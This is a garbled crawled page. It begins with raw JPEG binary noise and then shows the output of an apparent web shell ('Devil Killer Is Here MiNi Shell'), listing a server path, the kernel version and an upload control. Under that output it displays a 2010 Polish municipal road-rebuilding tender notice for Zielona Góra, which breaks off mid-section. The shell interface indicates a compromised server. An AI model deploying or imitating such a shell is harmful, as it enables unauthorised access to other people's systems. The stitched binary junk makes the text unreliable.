JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100910/248023-N-2010.html

<p class="kh_header"><b>Zielona Góra: Przebudowa ul. Jędrzychowskiej w Zielonej Górze - Etap II</b><br>
<b>Numer ogłoszenia: 248023 - 2010; data zamieszczenia: 10.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta , ul. Podgórna 22, 65-424 Zielona Góra, woj. lubuskie, tel. 0684564100,4564406 do 08, faks 068 4564155, 4564455.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zielona-gora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ul. Jędrzychowskiej w Zielonej Górze - Etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przebudowa ul. Jędrzychowskiej w Zielonej Górze - Etap II.
2.	Przedmiot zamówienia należy wykonać w oparciu o:
2.1.	dokumentację projektową stanowiącą załącznik nr 10 do niniejszej SIWZ oraz 
2.2.	Specyfikacje Techniczne Wykonania i Odbioru Robót (STWiOR) stanowiące załącznik nr 11 do niniejszej SIWZ;
3.	Zakres rzeczowy inwestycji składa się z następujących elementów:
3.1.	Roboty drogowe - parametry techniczne: 
a)	kategoria ruchu - KR3,
b)	droga wojewódzka nr 283 o długości ok. 1734,00 m, 
c)	klasa drogi - Z,
d)	prędkość projektowa w terenie zabudowanym - Vp = 50 km/h,
e)	prędkość projektowa w terenie niezabudowanym - Vp = 60 km/h,
f)	dopuszczalny nacisk osi pojazdu - 115 kN,
g)	szerokość jezdni - 6,00, 6,80 m (lokalne poszerzenia do 10,00 m w obrębie rond),
h)	zewnętrzna średnica rond - Dz = 22,00 m,
i)	wyspy kierujące na ronda szerokości - 2,00 m,
j)	szerokość chodnika (lewostronnego) - 2,00 m,
k)	ciąg pieszo-rowerowy (prawostronny) o zmiennej szerokości: 2,50 ÷ 3,00 m
l)	szerokość chodnika (prawostronnego) - 1,50 m
m)	szerokość ścieżki rowerowej - 2,00m
n)	zatoki autobusowe o szerokości 3,00 m i długości 56,00 m (skos wjazdu 1:8, skos wyjazdu 1:4),
o)	szerokość poboczy utwardzonych - 1,25 m
3.1.1.	elementy ulicy: 
a)	krawężniki betonowe (stojące) o wymiarach 15x30 cm na ławie betonowej z oporem z betonu B15 (C12/15),
b)	krawężniki betonowe (najazdowe) o wymiarach 15x22 cm na ławie betonowej z oporem 
z betonu B15 (C12/15),
c)	krawężniki kamienne o wymiarach 30x20 cm na ławie betonowej,
d)	krawężniki betonowe (trapezowe) o wymiarach 37x40 cm na ławie betonowej z oporem 
z betonu B15 (C12/15),
e)	betonowe obrzeże chodnikowe o wymiarach 30x8 cm na ławie betonowej. 
3.1.2.	nawierzchnia jezdni:
a)	warstwa ścieralna z mieszanki mastyksowo-grysowej (SMA) gr. 5 cm o uziarnieniu 0/12,8 mm,
b)	warstwa wiążąca z betonu asfaltowego gr. 6 cm o uziarnieniu 0/20 mm,
c)	podbudowa zasadnicza z betonu asfaltowego o gr. 8 cm o uziarnieniu 0/20 mm,
d)	podbudowa tłuczniowa gr. 20 cm o uziarnieniu 0/31,5 mm,
e)	warstwa wzmacniająca gr. 10 cm - warstwa z gruntów stabilizowanych spoiwem (cementem) 
o Rm = 1,5 MPa.
3.1.3.	nawierzchnia chodnika:
a)	betonowa kostka brukowa gr. 8 cm typu cegła koloru szarego,
b)	podsypka cementowo - piaskowa gr. 5 cm,
c)	podbudowa z tłucznia kamiennego betonowego lub kamiennego (pokruszony materiał 
z rozbiórki) lub tłucznia kamiennego gr. 10 cm
3.1.4.	nawierzchnia zatok autobusowych:
a)	betonowa kostka brukowa gr. 10 cm typu behaton koloru grafitowego,
b)	podsypka cementowo - piaskowa gr. 3 cm,
c)	podbudowa zasadnicza gr. 20 cm - beton min C25/30 z rozproszonym zbrojeniem,
d)	warstwa wzmacniająca gr. 10 cm - warstwa z gruntów stabilizowanych spoiwem (cementem) 
o Rm = 2,5 MPa,
3.1.5.	nawierzchnia powiązań komunikacyjnych z działkami przyległymi przez chodnik:
a)	betonowa kostka brukowa gr. 8 cm typu behaton koloru czerwonego,
b)	podsypka cementowo - piaskowa gr. 3 cm,
c)	podbudowa zasadnicza gr. 12 cm - tłuczeń kamienny o uziarnieniu 0/31,5 mm
d)	warstwa wzmacniająca gr. 10 cm - warstwa z gruntów stabilizowanych spoiwem (cementem) 
o Rm = 1,5 MPa,
3.1.6.	nawierzchnia powiązań komunikacyjnych (ul. Makowa, Kasztanowa, Wronia, Warzywna, Funka, Wierzbowa, Kiełbińska):
a)	betonowa kostka brukowa gr. 8 cm typu behaton koloru grafitowego,
b)	podsypka cementowo - piaskowa gr. 3 cm,
c)	podbudowa zasadnicza gr. 20 cm - tłuczeń kamienny o uziarnieniu 0/31,5 mm,
d)	warstwa wzmacniająca gr. 10 cm - warstwa z gruntów stabilizowanych spoiwem (cementem) 
o Rm = 1,5 MPa,
3.1.7.	nawierzchnia na wysepkach:
a)	betonowa kostka brukowa gr. 8 cm koloru szarego, 
b)	płyty wysypkowe o wymiarach 30x10x30 cm na lawie z betonu min. C12/15,
c)	podsypka cementowo - piaskowa gr. 3 cm,
d)	podbudowa z tłucznia kamiennego o uziarnieniu 0/31,5 mm i zmiennej grubości,
e)	warstwa wzmacniająca gr. 10 cm - warstwa z gruntów stabilizowanych spoiwem (cementem) 
o Rm = 1,5 MPa,
3.1.8.	pierścień rond:
a)	kostka rzędowa granitowa gr. 10 cm obrabiana,
b)	podsypka cementowo - piaskowa gr. 3 cm,
c)	podbudowa betonowa z betonu klasy min. B15 (C12/15) gr. 15 cm,
d)	podbudowa z tłucznia kamiennego o uziarnieniu 0/63 mm i gr. 20 cm. 
3.1.9.	nawierzchnia powiązań komunikacyjnych z ulicami KR2: Arctowskiego, Groszkowskiego, Czekanowskiego, Łukaszewicza, Narutowicza;
a)	warstwa ścieralna z mieszanki mastyksowo-grysowej (SMA) gr. 5cm o uziarnieniu 0/12,8 mm,
b)	warstwa wiążąca z betonu asfaltowego gr. 8 cm o uziarnieniu 0/20 mm,
c)	podbudowa zasadnicza gr. 20 cm - tłuczeń kamienny o uziarnieniu 0/31,5 mm,
d)	warstwa wzmacniająca gr. 10 cm - warstwa z gruntów stabilizowanych spoiwem (cementem) 
o Rm = 1,5 MPa,
3.1.10.	ciąg rowerowy i pieszo-rowerowy (strona prawa) od km 0+000,00 do km 0+933,00:
a)	betonowa kostka brukowa gr. 8 cm typu cegła bezfazowa koloru czerwonego,
b)	podsypka cementowo - piaskowa gr. 5 cm,
c)	podbudowa z tłucznia kamiennego o uziarnieniu 0/31,5 mm i gr. 10cm,
3.1.11.	ciąg rowerowy od km 0+933,00:
a)	warstwa ścieralna z betonu asfaltowego gr. 4 cm,
b)	podbudowa zasadnicza z kruszywa łamanego lub naturalnego stabilizowanego mechanicznie lub tłucznia kamiennego gr. 10 cm,
3.1.12.	nawierzchnia pętli autobusowej:
a)	warstwa ścieralna z mieszanki mastyksowo-grysowej (SMA) gr. 5 cm o uziarnieniu 0/12,8 mm,
b)	warstwa wiążąca z betonu asfaltowego gr. 6 cm o uziarnieniu 0/20 mm,
c)	warstwa wiążąca z betonu asfaltowego gr. 8 cm o uziarnieniu 0/20 mm,
d)	podbudowa zasadnicza gr. 20 cm - tłuczeń kamienny o uziarnieniu 0/31,5 mm,
e)	warstwa wzmacniająca gr. 10 cm - warstwa z gruntów stabilizowanych spoiwem (cementem) 
o Rm = 1,5 MPa,
3.2.	Kanalizacja deszczowa:
a)	studzienki ściekowe z elementów prefabrykowanych betonowe z osadnikiem bez syfonu 
o średnicy O 500 mm z pierścieniem odciążającym, przykryte żeliwnym wpustem deszczowym klasy D-400, o średnicy O 600 mm - 53 szt.,
b)	studnie rewizyjne z kręgów betonowych B45 o średnicy O 1200 mm łączone na uszczelki
z prefabrykowanym dnem i przykryte płytą żelbetową na pierścieniu odciążającym z włazami 
o średnicy O 600 mm z wypełnieniem betonowym, D-400 - 50 szt.,
c)	studnie rewizyjne z kręgów betonowych B45 o średnicy O 1400 mm łączone na uszczelki
z prefabrykowanym dnem i przykryte płytą żelbetową na pierścieniu odciążającym z włazami 
o średnicy  O  600 mm z wypełnieniem betonowym, D-400 - 2 szt.,
d)	rurociąg o średnicy O 200 mm z rur PCV-U litych, kl. SN8 - ok. 320,00 m,
e)	rurociąg o średnicy O 250 mm z rur PCV-U litych, kl. SN8 - ok. 311,00 m,
f)	rurociąg o średnicy O 315 mm z rur PCV-U litych, kl. SN8 - ok. 937,00 m,
g)	rurociąg o średnicy O 400 mm z rur PCV-U litych, kl. SN8 - ok. 63,00 m,
3.3.	Oświetlenie:
a)	demontaż słupów oświetleniowych wraz z wysięgnikami o masie 100 -300kg - 31 szt.,
b)	demontaż opraw oświetleniowych - 31 szt.,
c)	montaż słupa oświetleniowego aluminiowego jednoelementowego cylindryczno-stożkowego wkopywanego do ziemi o całkowitej długości 10 m (dł. części podziemnej słupa - 1,5 m, wysokość nad gruntem - 8,5 m) - 59 szt. Słup na całej długości anodowany na kolor naturalny o minimalnej grubości powłoki anodowej 20 mikronów. Słup w części wkopywanej do ziemi, jak również do wysokości 350 mm od powierzchni terenu, zabezpieczony dodatkowo warstwą elastomeru poliuretanowego w kolorze zbliżonym do koloru słupa. Grubość ścianki na całej długości słupa - minimum 4 mm. Średnica rury w dolnej części słupa i na styku 
z gruntem winna wynosić O 180 mm, na szczycie O 60 mm na długości 18 cm w celu umożliwienia montażu wysięgnika. Wysięgnik aluminiowy pojedynczy o długości ramienia 1,5 m wykonany z giętej rury aluminiowej o średnicy O 60 mm i spawany do głowicy aluminiowej 
o średnicy zewnętrznej O 76 mm. Wysięgnik anodowany na kolor naturalny o minimalnej grubości powłoki anodowej 20 mikronów. Całkowita wysokość zawieszenia oprawy oświetleniowej h=9,5 m. Słup oświetleniowy wyposażony w tabliczkę bezpiecznikową lub złącze bezpiecznikowe typu IZK. Na slupie zamontować tabliczkę aluminiową z numeracją słupa,
d)	oprawy oświetleniowe SGS-203/150W z kloszem z poliwęglanu i lampą SON-T Plus 150W - 
59 szt., 
e)	kabel oświetleniowy typ YKY 4x16 mm2 - 2647,00 m, 
f)	montaż słupa stalowego ocynkowanego wysokości 6 m z wysięgnikiem długości ramienia 4 m (latarnia oświetlenia przejścia dla pieszych) - 22 szt.,
g)	oprawy oświetleniowe np. typu Calypso Zebra wg katalogu Schreder z wysokoprężną lampą metalohalogenkową 150W - 22 szt.,
3.4.	Zieleń drogowa:
a)	rozścielenie ziemi urodzajnej na terenie płaskim z transportem urobku,
b)	wykonanie trawników dywanowych siewem,
3.5.	Roboty towarzyszące - roboty drogowe należy skoordynować z następującymi robotami towarzyszącymi, dla których przygotowano odrębne dokumentacje:
a)	przebudowa sieci gazowej,
b)	przebudowa sieci elektroenergetycznych SN 15 kV i nn 0,4 kV,
c)	przebudowa sieci telekomunikacyjnej Telekomunikacji Polskiej S.A. (TP S.A.),
3.5.1.	przebudowa sieci gazowej:
a)	rurociąg z rur polietylenowych w zwojach (HDPD) o średnicy nominalnej O 90 mm - 29,00 m,
b)	rurociąg z rur polietylenowych prostych (HDPD) o średnicy nominalnej O 160 mm - 59,00 m,
c)	rura osłonowa stalowa o średnicy D320 - 16,00 m,
d)	rura osłonowa stalowa o średnicy D180 - 9,00 m,
e)	kurki gazowe doziemne - 2 szt.
3.5.2.	przebudowa sieci elektroenergetycznych SN 15 kV i nn 0,4 kV:
a)	przełożenie linii kablowej niskiego napięcia 0,4 kV (kabel YAKY 4x120mm2) - 40,00 m,
b)	ułożenie nowego odcinka linii kablowej średniego napięcia 15 kV 3XYHAKXs 1x120 mm2 
- 120,00 m,
c)	demontaż kolidującego odcinka linii kablowej średniego napięcia 15 kV 3XYHAKXs 1x120 mm2 - 120,00 m,
d)	ułożenie nowego odcinka linii kablowej średniego napięcia 15 kV 3XYHAKXs 1x240 mm2 - 120,00 m,
e)	demontaż kolidującego odcinka linii kablowej średniego napięcia 15 kV 3XYHAKXs 1x240 mm2 - 120,00 m,
3.5.3.	przebudowa sieci telekomunikacyjnej Telekomunikacji Polskiej S.A. (TP S.A.):
a)	kabel XzTKMXpw 5x4x0,5 - 15,00 m,
b)	kabel XzTKMXpw 10x4x0,5 - 517,00 m,
c)	kabel XzTKMXpw 25x4x0,5 - 246,00 m,
d)	kabel XzTKMXpw 35x4x0,5 - 203,00 m,
e)	budowa studni kablowych SKR-2 - 8 szt.,
f)	rozbiórka studni kablowych SKR-2, SK-2/1 - 4 szt.,
g)	wyciąganie kabla z kanalizacji kablowej - 717,00 m,
h)	budowa kanalizacji telefonicznej z rur HDPE 110 - 0,026 km/otw.,
i)	budowa kanalizacji telefonicznej z rur PCV110 - 0,428 km/otw.,
j)	budowa kanalizacji telefonicznej z osłon rurowych dzielonych A110PS - 0,051 km/otw.,
k)	przełożenie kabla doziemnego - 154,00 m,
l)	montaż złączy równoległych kabli do 20÷70 par - 12 złączy,
3.6.	Budowle inżynierskie:
3.6.1.	przepust drogowy:
a)	żelbetowy wlot do 3 rur o średnicy O 600 mm z tworzywa sztucznego PEHD,
b)	żelbetowy wylot z 3 rur o średnicy O 600 mm z tworzywa sztucznego PEHD,
c)	płyty żelbetowe wraz z izolacją przeciwwilgociową zabezpieczające 3 rury o średnicy O 600 mm, 
d)	barierki ochronne, stalowe z płaskowników o wysokości h=1,10 m o masie do 17kg/m,
3.6.2.	mur oporowy:
a)	ścianka oporowa, żelbetowa wylewana z betonu B30 (część podziemna), 
b)	ścianka oporowa, żelbetowa wylewana z betonu B30 (część pionowa), 
c)	izolacja przeciwwilgociowa pozioma,
d)	izolacja przeciwwilgociowa pionowa,
e)	barierki ochronne, stalowe z płaskowników o wysokości h= 1,10 m o masie do 17kg/m.
4.	Wyszczególnienie prac zawierają kosztorysy ofertowe stanowiące załącznik nr 9 do niniejszej SIWZ oraz dokumenty, o których mowa w pkt 3.2. SIWZ;
5.	Zakres prac oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną ceną ofertową obejmuje również:
a)	organizację, zagospodarowanie i utrzymanie zaplecza budowy, roboty przygotowawcze 
i porządkowe;
b)	pełne ubezpieczenie budowy zgodnie z obowiązującymi przepisami prawa;
c)	zorganizowanie i przeprowadzenie niezbędnych odbiorów;
d)	wykonanie powykonawczej dokumentacji technicznej oraz mapy geodezyjnej;
e)	ponoszenie kosztów związanych ze zużyciem wody i energii elektrycznej na potrzeby budowy;
f)	zapewnienie na terenie  budowy należytego ładu i porządku, przestrzeganie przepisów BHP oraz utrzymanie  terenu budowy w stanie wolnym od przeszkód komunikacyjnych;
g)	zapewnienie i ponoszenie kosztów związanych z usunięciem oraz składowaniem materiałów rozbiórkowych i innych odpadów powstałych w czasie realizacji przedmiotu zamówienia;
h)	po zakończeniu robót uporządkowaniu terenu, w terminie nie późniejszym niż termin odbioru przedmiotu zamówienia.
6.	Wyłoniony Wykonawca zobowiązany jest dostarczyć Zamawiającemu przed podpisaniem umowy kopię aktualnej polisy ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej obejmującej okres realizacji i wartości zamówienia. W przypadku, gdy termin obowiązywania polisy będzie się kończył przed terminem zakończenia umowy, Wykonawca na 14 dni przed upływem tego terminu, ma obowiązek przedłożyć Zamawiającemu dokument o kontynuacji ubezpieczenia.
7.	Wyłoniony Wykonawca zobowiązany jest dostarczyć Zamawiającemu przed podpisaniem umowy harmonogram rzeczowo - finansowy realizacji inwestycji.
8.	Wykonawca na wykonany przedmiot zamówienia udzieli gwarancji należytego wykonania robót na okres 5 lat od dnia odbioru końcowego oraz rękojmi za wady robót na okres przekraczający gwarancję o 6 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.31.62.12-1, 45.23.24.10-9, 45.31.61.10-9, 45.23.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany wraz ze złożeniem oferty do wniesienia wadium w wysokości 190.000,00 złotych (słownie: sto dziewięćdziesiąt tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 2 ustawy pzp oraz spełniający szczegółowe warunki udziału w postępowaniu:
1.	posiadają wiedzę i doświadczenie w realizacji w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch zadań o minimalnej wartości 4.000.000,00 zł brutto każde, w zakresie budowy,  przebudowy lub remontu ulicy lub drogi wraz z kanalizacją deszczową i oświetleniem - udokumentowanych, że zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (Zamawiający dopuszcza sumowanie zadań celem uzyskania wymaganego warunku kwotowego).
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3), 6.1.6) i 6.1.9) SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki zawarte w art. 22 ust. 1 pkt 3 ustawy pzp oraz spełniający szczegółowe warunki udziału w postępowaniu:
1.	dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2006 r. Nr 156, poz. 1118 - tekst jednolity z późn. zm.) uprawnienia do kierowania robotami budowlanymi w specjalności:
a.	drogowej bez ograniczeń;
b.	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń;
c.	instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń;
d.	konstrukcyjno - budowlanej w ograniczonym zakresie;
e.	telekomunikacyjnej bez ograniczeń
 	lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów; 
Ocena spełniania warunku udziału w postępowaniu zostanie dokonana zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3), 6.1.7) - 6.1.9) SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>brak wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
